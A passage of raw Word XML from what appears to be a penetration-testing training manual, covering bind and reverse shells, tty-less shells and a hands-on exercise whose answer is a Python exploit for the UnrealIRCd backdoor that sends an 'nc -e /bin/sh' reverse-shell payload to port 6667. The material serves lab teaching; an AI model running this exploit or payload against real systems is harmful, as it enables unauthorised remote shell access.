        <w:t xml:space="preserve"> can be useful when the attacker machine uses NAT (as the shell cannot connect back to the attacker), whereas reverse shell</w:t>
      </w:r>
      <w:r w:rsidR="003453A0">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are useful when a firewall</w:t>
      </w:r>
      <w:r w:rsidR="00C628FE">
        <w:t xml:space="preserve"> is blocking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> direct connection</w:t>
      </w:r>
      <w:r w:rsidR="00496537">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a host. However, firewalls so</w:t>
      </w:r>
      <w:r w:rsidR="001C1726">
        <w:t>metimes allow only some ports</w:t>
      </w:r>
      <w:r w:rsidR="00FB5550">
        <w:t xml:space="preserve"> related to specific protocol</w:t>
      </w:r>
      <w:r w:rsidR="001C1726">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00FB5550">
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:r w:rsidR="001C1726">
        <w:t>HTTP,</w:t>
      </w:r>
      <w:r w:rsidR="00FB5550">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C1726">
        <w:t>HTTPS, …).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC5127A" w14:textId="4AD2C05C" w:rsidR="00D532B9" w:rsidRDefault="001376D0" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>During a pentest, an attacker may often ob</w:t>
      </w:r>
      <w:r w:rsidR="00A76720">
        <w:t>tain a shell without having tty.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0090491A">
        <w:t>This</w:t>
      </w:r>
      <w:r w:rsidR="00A76720">
        <w:t xml:space="preserve"> means it</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003A1DF6">
        <w:t xml:space="preserve">does not </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">provide </w:t>
      </w:r>
      <w:r w:rsidR="003A1DF6">
        <w:t>full</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> interactivity with the system (for instance, a CTRL-C will ki</w:t>
      </w:r>
      <w:r w:rsidR="003C5449">
        <w:t xml:space="preserve">ll the entire connection </w:t>
      </w:r>
      <w:r>
        <w:t>instead of stopping the running program on the host)</w:t>
      </w:r>
      <w:r w:rsidR="00130FF8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0078054F">
        <w:t xml:space="preserve"> Moreover, some commands like su or ssh require a proper terminal to run.</w:t>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:t xml:space="preserve"> Some tips to get a fully functional terminal are given in </w:t>
      </w:r>
      <w:r w:rsidR="00E426D9">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:instrText xml:space="preserve"> REF _Ref518890299 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:t>Developing an exploit</w:t>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00E426D9">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="003A1DF6">
        <w:t xml:space="preserve"> section</w:t>
      </w:r>
      <w:r w:rsidR="00D532E3">
        <w:t xml:space="preserve"> below</w:t>
      </w:r>
      <w:r w:rsidR="0076605E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE1750B" w14:textId="5B6916A7" w:rsidR="004F1C6D" w:rsidRDefault="004F1C6D" w:rsidP="006E344C">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A convenient way to know whether or not </w:t>
      </w:r>
      <w:r w:rsidR="004B7532">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidR="004B7532">
        <w:t xml:space="preserve"> is a tty or not is to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="004B7532">
        <w:rPr>
          <w:rStyle w:val="CodeCommand"/>
        </w:rPr>
        <w:t>tty</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command on Linux and Unix system. If it returns something like “/dev/pts/1” the current shell is a terminal, else it says “not a tty”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C90CFCC" w14:textId="1C37ABD0" w:rsidR="00B80C42" w:rsidRDefault="00B80C42" w:rsidP="006213FC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Ref518890299"/>
      <w:r>
        <w:t>Developing</w:t>
      </w:r>
      <w:r w:rsidR="00B7212E">
        <w:t xml:space="preserve"> an exploit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="7A20CF0D" w14:textId="73E3C779" w:rsidR="00DC3CCF" w:rsidRDefault="008D76B5" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Once attackers have finished their recon phase, they may</w:t>
      </w:r>
      <w:r w:rsidR="00DC3CCF">
        <w:t xml:space="preserve"> have found </w:t>
      </w:r>
      <w:r w:rsidR="004B7532">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00DC3CCF">
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on their target but n</w:t>
      </w:r>
      <w:r w:rsidR="00DC3CCF">
        <w:t>o exploit to turn this vulnerability into an attack vector. Sometimes, exploits might be available but for another platform and some change</w:t>
      </w:r>
      <w:r w:rsidR="004B7532">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00DC3CCF">
        <w:t xml:space="preserve"> are required to make them work on the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6272A5" w14:textId="77777777" w:rsidR="00A66389" w:rsidRDefault="003524FD" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>That is</w:t>
      </w:r>
      <w:r w:rsidR="00DC3CCF">
        <w:t xml:space="preserve"> why it is important to know how to develop exploits.</w:t>
      </w:r>
      <w:r w:rsidR="008D76B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B16E44" w14:textId="3CA1EA52" w:rsidR="00EB058C" w:rsidRDefault="00B7212E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t>HANDS ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513712C1" w14:textId="5C3FEA9E" w:rsidR="0022279D" w:rsidRDefault="00B7212E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>A backdoor ex</w:t>
      </w:r>
      <w:r w:rsidR="00243B9C">
        <w:t>ists in the UnrealIRCD version running on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D0095B">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EBB17A" w14:textId="219209F7" w:rsidR="00B7212E" w:rsidRDefault="0022279D" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t>Look for information about this vulnerability and w</w:t>
      </w:r>
      <w:r w:rsidR="00B7212E">
        <w:t>rite an exploit to ge</w:t>
      </w:r>
      <w:r w:rsidR="00F07E02">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00B7212E">
        <w:t xml:space="preserve"> a shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7208B9" w14:textId="3E9BCE09" w:rsidR="00B7212E" w:rsidRDefault="00B7212E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Text"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Do not </w:t>
      </w:r>
      <w:r w:rsidR="00F07E02">
        <w:t xml:space="preserve">make </w:t>
      </w:r>
      <w:r>
        <w:t>use</w:t>
      </w:r>
      <w:r w:rsidR="00F07E02">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DA1646" w14:textId="298B1FB6" w:rsidR="00B7212E" w:rsidRDefault="00B7212E" w:rsidP="002F7918">
      <w:pPr>
        <w:pStyle w:val="Hands-on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HANDS ON </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">  ANSWERS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1583C5" w14:textId="54B1BE63" w:rsidR="00B7212E" w:rsidRDefault="00B7212E" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>A previous nmap scan of 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="00B616D6">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC6726">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> showed that the IRC </w:t>
      </w:r>
      <w:r w:rsidR="00CE467D">
        <w:t>daemon</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is on port 6667.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364450B8" w14:textId="77777777" w:rsidR="00657F8C" w:rsidRDefault="0024441B" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The backdoor is triggered by sending “AB;”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF7335" w14:textId="29BC5A82" w:rsidR="0024441B" w:rsidRDefault="0024441B" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The following python script tries to connect </w:t>
      </w:r>
      <w:r w:rsidR="00A66389">
        <w:t>to a given host on a given port and to start a reverse shell back to the attacker machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E8E6EC" w14:textId="77777777" w:rsidR="0015582D" w:rsidRDefault="0015582D" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07636EF0" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3AD83B" w14:textId="20682540" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B86412D" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087F2B00" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A155B3" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75617E6E" w14:textId="4789B6CF" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LHOST = </w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"192.168.21</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00657F8C">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383C29F6" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>LPORT = 1234</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7722A0B3" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="067BE72C" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A602513" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>def</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploit(ip, port):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B3C8B" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    host = ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CE76E3" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    port = int(port)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B3CCDD" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    payload = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"AB;nc -e /bin/sh {} {}\n"</w:t>
      </w:r>
      <w:r>
        <w:t>.format(LHOST, LPORT).encode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7116D" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF465F5" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[*] Launching exploit on {}:{}"</w:t>
      </w:r>
      <w:r>
        <w:t>.format(ip, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F815EF" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[*] Payload is: {}"</w:t>
      </w:r>
      <w:r>
        <w:t>.format(payload.decode()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6E58EE" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756538B" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CFADFF" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>try</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B52F9CF" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        sock.connect((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694662CC" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> socket.error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C491BD4" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[x] ERROR while opening socket..."</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBD6730" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2C67BE" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E94AC8D" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[+] Connexion established !"</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AC96D5" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[*] Sending payload..."</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70233BB9" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sock.sendall(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B719F4" w14:textId="58D5C85D" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[+] Payload sent</w:t>
      </w:r>
      <w:r w:rsidR="00580247">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>!"</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B4EEE" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ret = sock.recv(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BFB728" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(ret.decode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E26A4C" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    sock.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A14CD9C" w14:textId="32CD282A" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00182B0E">
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"[+] Finished</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t xml:space="preserve"> !"</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B20B802" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="413FF281" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D47072B" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>__name__</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"__main__"</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EAE153" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> len(sys.argv) != 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D30BCA" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800000"/>
        </w:rPr>
        <w:t>"Usage: {} &lt;IP&gt; &lt;port&gt;"</w:t>
      </w:r>
      <w:r>
        <w:t>.format(sys.argv[0]))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7807AC" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        sys.exit(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CB094F" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F30DB89" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        exploit(sys.argv[1], sys.argv[2])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E08881" w14:textId="77777777" w:rsidR="006726E4" w:rsidRDefault="006726E4" w:rsidP="006726E4">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1452DFBD" w14:textId="77777777" w:rsidR="00961FED" w:rsidRDefault="00961FED" w:rsidP="00615044">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
